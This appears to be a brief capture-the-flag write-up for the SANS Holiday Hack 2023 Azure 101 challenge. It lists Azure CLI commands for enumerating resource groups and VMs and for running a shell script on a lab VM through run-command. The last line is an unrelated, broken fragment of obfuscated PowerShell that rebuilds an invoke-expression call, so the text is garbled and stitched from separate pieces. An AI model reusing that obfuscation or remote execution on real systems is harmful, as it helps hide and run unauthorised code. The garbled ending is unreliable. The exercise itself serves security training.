SANS Holiday Hack 2023 Write-Up
Azure 101
- Get help with
az help | less
- List all resource groups:
az group list
- List all function apps within a resource group:
az functionapp list -g northpole-rg1
- List the only VM in the resource group you have access to:
az vm list -g northpole-rg2
- You don’t have access to any VMs in the other resource group, northpole-rg1
- Invoke a run-command against said VM so you can run RunShellScript and get a directory listing to reveal a file on the Azure VM
az vm run-command invoke -g northpole-rg2 -n NP-VM1 --command-id RunShellScript --scripts "ls"
[StRiNg]::JoIn( ‘’, ChaR[]) | & ((gv ‘MDr’).NamE[3,11,2]-joiN |